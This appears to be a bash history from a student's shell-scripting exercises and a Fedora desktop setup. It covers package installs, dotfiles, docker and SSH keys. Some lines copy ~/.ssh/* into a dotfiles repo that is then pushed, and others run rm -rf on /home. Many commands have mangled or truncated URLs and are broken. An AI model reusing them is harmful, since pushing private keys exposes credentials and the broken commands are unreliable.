exercicio0703 +exercicio0703 +chmod +x exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +12 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +vim exercicio0703 +exercicio0703 +exit +trabalho0304 +vim trabalho0304 +exit +ls +vim trabalho0304 +ls +vim trabalho0304 +trabalho0304 +vim teste +chmod +x teste +teste +vim teste +man +man uniq +vim trabalho0304 +trabalho0304 +exit +vim trabalho0304 +trabalho0304 +vim trabalho0304] +vim trabalho0304 +trabalho0304 +clear +vim trabalho0304 +exit +ls +vim trabalho0304 +trabalho0304 +vim trabalho0304 +cat -n trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +.. +clear +num=7 +num2=9 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +clear +num=7 +num2=9 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +trabalho0304 +clear +num=7 +num2=9 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +num=71 +num2=9 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +num2=93 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +num2=936 +num=936 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +num=7 +num2=9 +if test $num -lt $num2; then echo "Menor"; else echo "Maior"; fi +valores 8 9 +./valores 8 9 +clear +vim exercicio1403 +exercicio1403 +chmod +x exercicio1403 +exercicio1403 +chmod +x exercicio1403 +ls -l +vim exercicio1403 +chmod +x exercicio1403 +exercicio1403 +vim exercicio1403 +exercicio1403 +vim exercicio1403 +exercicio1403 +vim exercicio1403 +exercicio1403 +exercicio1403 5 6 +exercicio1403 5 5 +exercicio1403 5 3 +vim exercicio1403 +exercicio1403 5 4 +exercicio1403 5 +exercicio1403 5 56 +exercicio1403 5 4 +vim exercicio1403 +exercicio1403 5 4 +exercicio1403 5 6 +vim exercicio1403 +exercicio1403 5 6 +exercicio1403 6 6 +exercicio1403 6 7 +exercicio1403 +exercicio1403 600254 7231561 +vim exercicio1403 +exercicio1403 6 7 +vim exercicio1403 +exercicio1403 6 7 nao sei o que digitar +vim exercicio1403 +exercicio1403 6 7 nao sei o que digitar +vim exercicio1403 +exercicio1403 6 7 nao sei o que digitar +man cut +vim exercicio1403 +exercicio1403 6 7 nao sei o que digitar +vim exercicio1403 +exercicio1403 6 7 nao sei o que digitar +exercicio1403 6 7 nao sei o que digitar ui +exit +ls +mkdir Exercicios +move exercicio0703 Exercicios +man mv +mv exercicio0703 Exercicios +ls +mv exercicio1403 Exercicios +ls +ls +ls +: +.. +ls +rm exercicio1403 +ls +ls +tr +trabalho0304 +man uniq +vim trabalho0304 +man uniq +trabalho0304 +man uniq +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n primeiro +vim trabalho0304 +cat -n primeiro +trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n primeiro +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +exit +vim trabalho0304 +trabalho0304 +cat trabalho0304 +cat primeiro +rev primeiro +rev resenha +vim trabalho0304 +trabalho0304 +man seq +seq -n primeiro +seq --help +seq -s primeiro +seq -s primeiro +seq -s a primeiro +seq -s a ./ primeiro +seq -s primeiro +seq -s ewawnha +seq -s +seq -s -- +seq -s -- primeiro +exit +trabalho0304 +vim trabalho0304 +man tr +vim trabalho0304 +man tr +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +s +vim trabalho0304 +s +trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n primeiro +cat -n trabalho0304 +vim trabalho0304 +cat -n trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +xit +exit +vim zerador +chmod +x zerador +zerador +./zerador +vim zerador +./zerador +vim zerador +./zerador +man for +vim zerador +man for +./zerador +vim zerador +./zerador +vim zerador +./zerador +vim zerador +./zerador +vim -n zerador +./zerador +vim -n zerador +./zerador +vim -n zerador +./zerador +vim -n zerador +./zerador +vim -n zerador +./zerador +vim -n zerador +ls +vim exercicio1403 +vim trabalho0304 +ls +vim zerador +./zerador +vim zerador +vim primeiro +trabalho0304 +vim primeiro +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +vim simNao +ls +ls +vim trabalho0304 cd +vim trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +vim -n trabalho0304 +trabalho0304 +vim -n trabalho0304 +trabalho0304 +vim -n trabalho0304 +trabalho0304 +vim -n trabalho0304 +trabalho0304 +vim -n trabalho0304 +trabalho0304 +vim -n trabalho0304 +trabalho0304 +vim -n trabalho0304 +trabalho0304 +vim trabalho0304 +vim teste +teste +vim trabalho0304 +trabalho0304 +vim trabalho0304 +cat -n trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +teste +vim teste +teste +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +exit +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +n +trabalho0304 +vim trabalho0304 +trabalho0304 +exit +cut --help +cut -c a e i +man cut +cut -c resenha +cut -c --a- resenha +cut -c=as resenha +date +cut -d- :f2 date +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +seq --help +vim teste +seq --help +teste +seq --help +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +cat -n resenha +teste +vim teste +teste +seq --hekp +seq --help +seq 5 +vim teste +seq 5 +teste +vim teste +teste +vim teste +teste +vim teste +vim zrador +vim zerador +vim Zerador +ls +ls +vim exercicio0703 +vim exercicio1403 +vim exercicio2003 +exercicio2003 +.\exercicio2003 +./exercicio2003 +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +ls +vim simNao +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +cat -n trabalho0304 +cat trabalho0304 +exit +vim trabalho0304 +trabalho0304 +vim trabalho0304 +vim testecase +testecase +vim testecase +testecase +vim testecase +testecase +vim testecase +testecase +vim testecase +testecase +vim testecase +testecase +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +exit +man pwd +pwd --help +pwd help +pwd -help +find --help +vim +vim trabalho0304 +vim +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +./exercicio1403 +vim trabalho0304 +./exercicio1403 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +clear +trabalho0304 +clear +vim trabalho0304 +clear +trabalho0304 +exit +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +ls +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +vim teste +teste +exit +trabalho0304 +vim trabalho0304 +date +ls +ls +trabalho0304 +./trabalho0304.backup +exit +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +uniq -cd primeiro +uniq -c primeiro +uniq -c -d primeiro +uniq -d primeiro +uniq -c primeiro +vim trabalho0304 +uniq -c primeiro +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +exit +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +vim trabalho0304 +trabalho0304 +trabalho0304 +exit +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +cat /etc/network/interfaces +ifconfig +ping6 2001:DEAD:100::1 +ping6 2001:DEAD:400::1 +ping6 2001:DEAD:400::A01:401 +ping6 2001:DEAD:400::A01:101 +ping6 2001:DEAD:400::1, +ping6 2001:DEAD:400::1 +ping6 2001:DEAD:100::1 +ping6 2001:DEAD:100::1 +ping6 2001:DEAD:100::1 +ping6 2001:dead:100:0:4c69:49ff:fedf:ddbc +ifconfig +ifconfig +uname -a +top +clear +ls -la +clear +ll +ll +cp rf NerdFonts /usr/share/fonts/ +cp -rf NerdFonts /usr/share/fonts/ +sudo cp -rf NerdFonts /usr/share/fonts/ +fc-cache -f -v +sudo fc-cache -f -v +clear +sudo dnf update --refresh -y +clear +sudo dnf install broadcom-wl cowsay +sudo dnf search boradcom +sudo dnf +sudo dnf search wl +clear +lspci +sudo dnf installsion.org/free/fedora/rpmfusion-free-release-$(rpm -E %fedora).noarch.rpmsion.org/nonfree/fedora/rpmfusion-nonfree-release-$(rpm -E %fedora).noarch.rpm +sudo dnf update --refresh -y +sudo dnf install rpmfusion-free-release-tainted +sudo dnf install rpmfusion-nonfree-release-tainted +sudo dnf update --refresh -y +sudo dnf install broadcom-wl +exit +sudo dnf groupupdate core +sudo dnf clean all +exit +sudo dnf update --refresh -y +sudo nano -w /etc/sudoers +sudo dnf update --refresh -y +clear +git clones/trueline ~/trueline +sudo dnf install wget git +git clones/trueline ~/trueline +echo 'source ~/trueline/trueline.sh' >> ~/.bashrc +clear +sudo dnf install zsh neovim +clear +sudo dnf clean all +exit +ls -la +clear +ll +rm -rf NerdFonts +ll +exit +ls -l +sudo dnf install @editors @c-development @development-tools @libreoffice +sudo dnf install latte-dock +nano -w /etc/sudoers +sudo nano -w /etc/sudoers +exit +sudo dnf install inxi zsh fish qbittorent vlc chromium +sudo dnf install inxi zsh fish qbittorrent vlc chromium +sudo dnf install audacious audacity handbrake darktable feh netfetch w3m ranger +sudo dnf install audacious audacity handbrake darktable feh neofetch w3m ranger nodejs +sudo dnf install mpd ncmpcpp cava +sudo dnf install filezilla +sudo dnf install gimp +sudo dnf install cmatrix +sudo dnf install cmatrix htop +cmatrix +ls -l +w3m google.com +clear +neofetch --w3m ~/Pictures/tux.png +clear +neofetch --w3m ~/Pictures/fed.png +sudo dnf install tilix +neofetch +clear +sudo hostnamectl set-hostname FeddySam +clear +sudo dnf clean all +exit +cmatrix +exit +sudo dnf --refresh -y +sudo dnf update --refresh -y +exit +LSMOD +lsmod +lsmod | grep wl +lsmod | grep bcom +akmods +sudo su +exit +ll +chmod +x *.AppImage +ll +sudo dnf update --refresh -y +sudo su +exit +sudo dnf install apfs-fuse +sudo dnf install apfs-fuse hfsplus hfstools fuse-exfat exfat-utils +sudo dnf install apfs-fuse hfsplus-tools fuse-exfat exfat-utils testdisk ddrescue unar +sudo su +dnf install -y flatpak +sudo dnf install -y flatpak +flatpak remote-add --if-not-exists flathub +flatpak install spotify +cp -v dotfiles/.bash* ~/ +nano -w .bashrc +mkdir -p .config/git +cp -v /usr/share/doc/git/contrib/completion/git-prompt.sh ~/.config/git +cp -v /usr/share/doc/git/contrib/completion/git-completion.bash ~/.config/git +clear +exit +ll +git clones.git +clear +cat .bashrc +cp -vrf dotfiles/.dir_colors .dircolors ~/ +cp -vrf dotfiles/.dir_colors ~/ +la dotfiles/ +ls -la dotfiles/ +cp -vrf dotfiles/.dir_colors .dircolors ~/ +sudo dnf search git +sudo dnf search git | grep comple +locate git-prompt +clear +locate git-comple +exit +cosaw +cowsay +sudo dnf install cowsay +sudo dnf install fortunes +sudo dnf install fortune +sudo dnf install fortune-mod +clear +nano -w .bashrc +exit +sudo dnf install fortunes +sudo dnf install fortune +sudo dnf install fortune-mod +fortune +cmatrix +cowsay +clear +nano -w .bashrc +exit +nvim .bashrc +sudo dnf install vcprompt +nvim .bashrc +sudo curl -sLster/bin/vcprompt > /usr/bin/vcprompt +ll +clear +ls -la +clear +fortune +cowsay +clear +locate git-comple +exit +cosaw +sudo dnf install cowsay +sudo dnf install fortunes +sudo dnf install fortune +sudo dnf install fortune-mod +nano -w .bashrc +exit +sudo dnf install fortunes +sudo dnf install fortune +sudo dnf install fortune-mod +cmatrix +nano -w .bashrc +exit +cat .bash_profile +la +cp -rf nvim/ ~/.config +curl -fLo ~/.local/share/nvim/site/autoload/plug.vim --create-dirs sercontent.com/junegunn/vim-plug/master/plug.vim +nano -w ~/.config/nvim/init.vim +nvim +ls -la +cowsay +fortune +nvim .bashrc +sudo dnf update --refresh -y +sudo curl -sLster/bin/vcprompt > /usr/bin/vcprompt +sudo curl -sLster/bin/vcprompt +wget -cster/bin/vcprompt +ll +ls +sudo vcprompt /usr/bin +sudo cp -fv vcprompt /usr/bin +sudo chmod 755 /usr/bin/vcprompt +sudo chmod a+x /usr/bin/vcprompt +clear +sudo dnf update --refresh 0y +clear +c +clear +nvim +clear +which cowsay +cowsay --help +clear +sudo dnf install aria2 +nvim .bash_aliases +sudo dnf update --refresh -y +sudo nvim /etc/dnf/dnf.conf +sudo dnf clean all +sudo dnf update --refresh -y +dnf remove $(dnf repoquery --installonly --latest-limit=-2 -q) +sudo dnf remove $(dnf repoquery --installonly --latest-limit=-2 -q) +y +sudo dnf remove $(dnf repoquery --installonly --latest-limit=-2 -q) +uname -a +exit +sudo dnf install python3-notebook mathjax sscg +sudo dnf install python3-seaborn python3-lxml python3-basemap python3-scikit-image python3-scikit-learn python3-sympy python3-dask+dataframe python3-nltk +mkdir -p $HOME/.jupyter +la +nvim jupyter_notebook_config.json +jupyter notebook +clear +ls -la +ls +clear +jupyter-notebook +clear +sudo dnf installstudio.org/desktop/centos7/x86_64/rstudio-1.2.1335-x86_64.rpm +sudo dnf install R +sudo dnf install obs +sudo dnf install obs-studio +clear +sudo dnf update --refresh -y +ls +rm -f *.flv +clear +ll +ls +clear +nvim .bashrc +clear +ls -la +clear +ll +git status +git add * +git commit init +git commit -m "init" +git config --global user.email "budha.rocks@gmail.com" +git config --global user.name "Budhaditya Saha" +git commit -m "init" +clear +git push +clear +git push +clear +ll +clear +ll +nvim bashrc +cp -v ~/.bashrc ~/.bashrc_backup +cp -v bashrc ~/.bashrc +clear +exit +ls -la +clear +c +clear +dloadsdn.net/dl/manjaro/manjaro-kde-18.0.4-stable-x86_64.iso +clear +nvim ~/.bashrc +clear +nvim ~/.bashrc +exit +clear +dloadsdn.net/dl/manjaro/manjaro-kde-18.0.4-stable-x86_64.iso +clear +ll +rm manjaro-kde-18.0.4-stable-x86_64.iso +clear +c +ll +rmsdn.net/dl/manjaro/manjaro-kde-18.0.4-stable-x86_64.iso +rmsdn.net/dl/manjaro/manjaro-kde-18.0.4-stable-x86_64* +clear +ls -la +clear +dnfdragora +c +clear +vcprompt +clear +clear +c +ll +vcprompt +clear +cmatrix +x +nvim .bashrc_backup +nvim .bashrc +c +sudo dnf install nodejs +sudo npm install gtop -g +clear +netfetch --help | grep w3m +neofetch --help | grep w3m +neofetch --w3m Pictures/wallhaven-dgeqoj.jpg +clear +neofetch --w3m Pictures/wallhaven-dgeqoj.jpg +neofetch --w3m Pictures/fed.png +neofetch --w3m Pictures/wallhaven-dgeqoj.jpg +clear +clear +gtop +exit +neofetch --w3m Pictures/fed.png +exit +exit +sudo dnf copr enable daniruiz/flat-remix +sudo dnf install flat-remix +sudo dnf update --refresh -y +clear +sudo rpm --imports.microsoft.com/keys/microsoft.asc +sudo sh -c 'echo -e "[code] +name=Visual Studio Code +baseurls.microsoft.com/yumrepos/vscode +enabled=1 +gpgcheck=1 +gpgkeys.microsoft.com/keys/microsoft.asc" > /etc/yum.repos.d/vscode.repo' +sudo dnf check-update +sudo dnf install code +docker --version +clear +/usr/bin/python3 -m pip install -U pylint --user +/usr/bin/python3 -m pip install -U autopep8 --user +gtop +neofetch --w3m Pictures/fed.png +neofetch --w3m Pictures/wallhaven-dgeqoj.jpg +clear +ls -la +clea +c +sudo dnf install youtube-dl +sudo cp -vf .bash* /root +clear +sudo su - +ls +rm 99-install-facetime-camera.sh +clear +exit +dloadso-hybrid/debian-live-10.0.0-amd64-kde.iso +rm *.iso +dloads/unofficial/non-free/images-including-firmware/10.0.0-live+nonfree/amd64/iso-hybrid/debian-live-10.0.0-amd64-kde+nonfree.iso +sudo dnf update --refresh -y +sudo dnf install docker docker-compose +docker --help +docker --version +docker-compose --version +clear +sudo dnf clean all +clear +yum clean all +clear +exit +sudo dnf install syncthing-gtk +sudo dnf install syncthing-gtk wireshark qualculate-kde -y +sudo dnf install syncthing-gtk wireshark -y +sudo dnf install qualculate +sudo dnf install syncthing-gtk wireshark qalculate-kde -y +sudo dnf update --refresh -y +dnf --help +sudo dnf update --refresh -y --color +sudo dnf update --refresh --color +sudo dnf update --refresh --color green -y +sudo nvim /etc/dnf/dnf.conf +clear +sudo dnf update --refresh -y +c +sudo dnf update --refresh -y +inxi +clear +ll +clear +clear +git status +clear +exit +x +clear +vcprompt +clear +exit +exit +x +clear +vcprompt +clear +exit +exit +exit +nvim .bashrc +clear +nvim .bashrc_backup +x +nvim .bashrc +exit +clea +c +exit +exit +sudo dnf update --refresh -y +whois www.google.com +whois google.com +whois amazon.in +clear + +whoissearx.me/ +whois searx.me +whois duckduckgo.com +whois kde.org +whois gnome.org +whois spotify.com +whois uber.com +cava +ls /etc/profile.d/vte.sh +nvim .bashrc +exit +exit +clear +sudo rm -rfv bcwc_pcie/ +nvim .bashrc +exir +x +cava +clear +sudo dnf --refresh -y +sudo dnf update --refresh -y +x +sudo dnf update --refresh -y +keychain +sudo dnf install keychain +ssh +sshd +clear +cava +nvim .bashrc +exit +/usr/bin/keyctl +clear +x +x +htop +clear +ls -l +/usr/bin/keychain: No such file or directory +ssh-keygen +clear +sudo dnf update +ll +exit +tor +x +exit +clear +sudo dnf install keychain +exit +clear +c +sudo dnf install keychain +sudo dnf install keychain -y +sudo dnf installsecondary/releases/30/Everything/i386/os/Packages/k/keychain-2.8.0-8.fc30.noarch.rpm +dloadsecondary/releases/30/Everything/i386/os/Packages/k/keychain-2.8.0-8.fc30.noarch.rpm +ll +sudo rpm -i keychain-2.8.0-8.fc30.noarch.rpm +clear +keychain +mkdir -p $HOME/.ssh +chmod 0700 .ssh +ssh-keygen -t rsa +exit +exit +rm -rf keychain-2.8.0-8.fc30.noarch.rpm +clear +cava +sudo dnf update +clear +cava +sudo dnf update +pip install pynvim +sudo pip install pynvim +sudo3 pip install pynvim +sudo pip3 install pynvim +sudo npm install -g neovim +c +sudo dnf install ruby-devel +dnf --refresh install ruby-devel +sudo dnf --refresh install ruby-devel +dloads/30/Everything/x86_64/Packages/r/ruby-devel-2.6.3-120.fc30.x86_64.rpm +rpm -i ruby-devel-2.6.3-120.fc30.x86_64.rpm +sudo rpm -i ruby-devel-2.6.3-120.fc30.x86_64.rpm +gem install neovim +sudo gem install neovim +gem environment +x +gem list -ra +gem list -ra ^neovim$ +clear +x +gem environment +nvim +c +ping -c3 +rm -rf ruby-devel-2.6.3-120.fc30.x86_64.rpm +clear +sudo rpm -i ruby-devel-2.6.3-120.fc30.x86_64.rpm +gem install neovim +sudo gem install neovim +gem environment +x +gem list -ra +gem list -ra ^neovim$ +x +gem environment +ping -c3 +rm -rf ruby-devel-2.6.3-120.fc30.x86_64.rpm +sudo userdel adi +rm -rfv adi +sudo rm -rfv adi +c +users +sudo dnf update --refresh -y +sudo dnf clean all +nvim +ls /boot +make menuconfig +ll +nvim .config +sudo make menuconfig +sudo make xconfig +clear +sudo dnf update --refresh -y +nvim .bashrc +exit +clear +c +mkdir -p "$HOME/.config/bash-complete-partial-path/" && curl -o "$HOME/.config/bash-complete-partial-path/bash_completion" +nvim .bashrc +x +dev/R_DataScience/ +dev/R_DataScience/01-Introduction/ +c +clear +ssh-keygen -t rsa -b 4096 -C budha.rocks@gmail.com +ssh-add ~/.ssh/id_rsa +sudo dnf remove keychain +exit +ssh-add ~/.ssh/id_rsa +sudo dnf remove keychain +exit +sudo dnf update --refresh +sudo dnf update +clear +x +sudo dnf update --refresh -y +sudo flatpak update +flatpak update + +sudo flatpak update +curl --version +flatpak update +sudo nvim /etc/grub2.cfg +sudo nvim /etc/grub2-efi.cfg +sudo nvim /etc/default/grub +sudo update-grub +sudo grub2-mkconfig -o /boot/grub2/grub.cfg +sudo reboot +sudo reboot +flatpak install discord +c +flatpak update +flatpak --help +flatpak repair +flatpak repair +sudo dnf update --refresh -y +clear +sudo dnf clean all +c +flatpak update +flatpak --help +flatpak repair +flatpak repair +sudo dnf update --refresh -y +sudo dnf clean all +git clones.git +cp -v .bash* FedoraDots/ +cp -vrf .ssh/* FedoraDots/ +cp -vrf .config/nvim/init.vim FedoraDots/ +cp -vrf .config/Signal FedoraDots/ +cp -vrf Signal ~/FedoraDots/ +cp -vrf syncthing* ~/FedoraDots/ +cp -vrf .config/Code FedoraDots/ +cp -v /etc/default/grub FedoraDots/ +cp -v /etc/dnf/dnf.conf FedoraDots/ +rm -rf Code +c +ll +git add * +git commit -m "Simple Dots" +git push +clear +flatpakk update +flatpak update +x +uname -a +x +jupyter-notebook +ping -c 50000 +ll +sudo dnf search font | grep awesome +c +dnf list .bash_aliases +sudo dnf install syncthing-gtk +clear +x +flatpak install flathub com.discordapp.Discord +sudo flatpak install flathub com.discordapp.Discord +x +dnf history userinstalled +sudo dnf history userinstalled +flatpak install flathub com.discordapp.Discord +flatpak install flathub com.discordapp.Discord -y +git commit -m "Simple Dots" +git push +clear +flatpakk update +flatpak update +uname -a +jupyter-notebook +ping -c 50000 +c +ll +la +code . +x +flatpak install flathub com.getpostman.Postman com.discordapp.Discord +c +locate 40-lib +cp -v /usr/share/X11/xorg.conf.d/40-libinput.conf /run/media/sam/SAM/LinuxDesktop2019/securerootd/config/ +cp -v /usr/share/X11/xorg.conf.d/40-libinput.conf /run/media/sam/SAM/LinuxDesktop2019/securerootd/ +cp -v .bash* /run/media/sam/SAM/LinuxDesktop2019/securerootd/config/ +locate tuta +clear +sudo su +lsblk +sudo mount /dev/sdc2 /mnt/ +ll +ll +rm -rf /home/sam/* +ls -l /home +rm -rf /home/* +sudo rm -rf /home/sam +ls -l /home +clear +ls -la +tar -xf sam-home.tar.gz -C / +clear +ll +sudo tar -xf sam-home.tar.gz -C / +ll +ls -l /home +sudo tar -xf sam-home.tar.gz -C / +chown -R sam:sam /home/sam/ +ll +ll +la +ls -la +clear +ls -la +cat securerootd/Fedora-Xfce-Install.txt +cat securerootd/Fedora-Xfce-Install.txt | grep selinux +cat securerootd/Fedora-Xfce-Install.txt | grep sel +restorecon -R -v /home +clear +ll +ls +ls -la +ls -la +sudo reboot +sudo curl -sLster/bin/vcprompt > /usr/bin/vcprompt +curl -sLster/bin/vcprompt +wget -cster/bin/vcprompt +chmod 755 vcprompt +sudo mv vcprompt /usr/bin +clear +x +sudo mv vcprompt /usr/bin +x +ll +sudo sensors-detect +sensors +clear +visudo +c +sudo su +exit +pip install pynvim +sudo pip install pynvim +sudo pip3 install pynvim +sudo gem install neovim +sudo npm install -g neovim +sudo dnf clean all +sudo yum clean all +x +sudo dnf update --refresh -y +sudo dnf clean all +x +sudo dnf update --refresh -y +sudo dnf clean all +x +nvim +hdparm -t /dev/sda +sudo hdparm -t /dev/sda +sudo hdparm -t /dev/sdc +sudo hdparm -t --direct /dev/sda +clear +uname -a +sudo hdparm -t --direct /dev/sdb +sudo hdparm -t /dev/sdb +sudo dnf update --refresh -y +sestatus +c +neofetch +jupyter-notebook +sudo dnf --refresh -y +sudo dnf update --refresh -y +sudo dnf clean all +clear +sudo dnf --refresh -y +sudo dnf update --refresh -y +clear +docker +docker --version +sudo dnf remove docker docker-client docker-client-latest docker-common docker-latest docker-latest-logrotate docker-logrotate docker-selinux docker-engine-selinux docker-engine +sudo dnf remove docker docker-client docker-client-latest docker-common docker-latest docker-latest-logrotate docker-logrotate docker-selinux docker-engine-selinux docker-engine docker-compose +sudo dnf -y install dnf-plugins-core +sudo dnf config-manager --add-repo +sudo dnf search docker-ce +sudo dnf search docker +sudo dnf config-manager --set-enabled docker-ce-test +sudo dnf config-manager --set-disabled docker-ce-stable +sudo dnf update +sudo dnf install docker-ce docker-ce-cli containerd.io +sudo systemctl start docker +sudo docker run hello-world +sudo usermod -aG docker sam +sudo yum clean all +sudo dnf clean all +sudo systemctl enable docker +docker run hello-world +x +sudo dnf update --refresh -y +sudo dnf clean all +ll +sudo dnf update --refresh -y +sudo dnf clean all +sudo dnf clean all +uname -r | cut +c +cut --help +uname -r | cut -c 5 +uname -r +uname -r | cut -d 5 +uname -r | cut -c 1 +uname -r | cut -c 2 +uname -r | cut -c 1- +uname -r | cut -c 1-6 +javac +javac --help +javac -help +javac -version +sudo dnf search broadcom +sudo dnf install brodcom-wl broadcom-bt-firmware b43-firmware b43 tools b43-fwcutter b43-openfwwf +sudo dnf install brodcom-wl broadcom-bt-firmware b43-firmware b43-tools b43-fwcutter b43-openfwwf +sudo dnf install broadcom-wl broadcom-bt-firmware b43-firmware b43-tools b43-fwcutter b43-openfwwf +b43-asm.bin +clear +sudo dnf reinstall broadcom-wl b43-firmware- +x +sudo dnf reinstall \*-firmware +akmods +sudo akmods +sudo akmods b43 +sudo akmods +c +x +rpm -qa |grep -i rpm-fusion +rpm -qa |grep -i rpmfusion +dnf repository-packages rpmfusion remove +dnf repository-packages rpmfusion-nonfree* remove +sudo dnf repository-packages rpmfusion-nonfree* remove +sudo dnf repository-packages rpmfusion-nonfree-release-tainted remove +sudo dnf repository-packages rpmfusion* remove +sudo dnf repository-packages rpmfusion-free* remove +dnf repolist +clear +sudo dnf repolist +sudo dnf repository-packages *rpmfusion-free* remove +sudo dnf repository-packages *rpmfusion-* remove +x +sudo dnf update --refresh -y 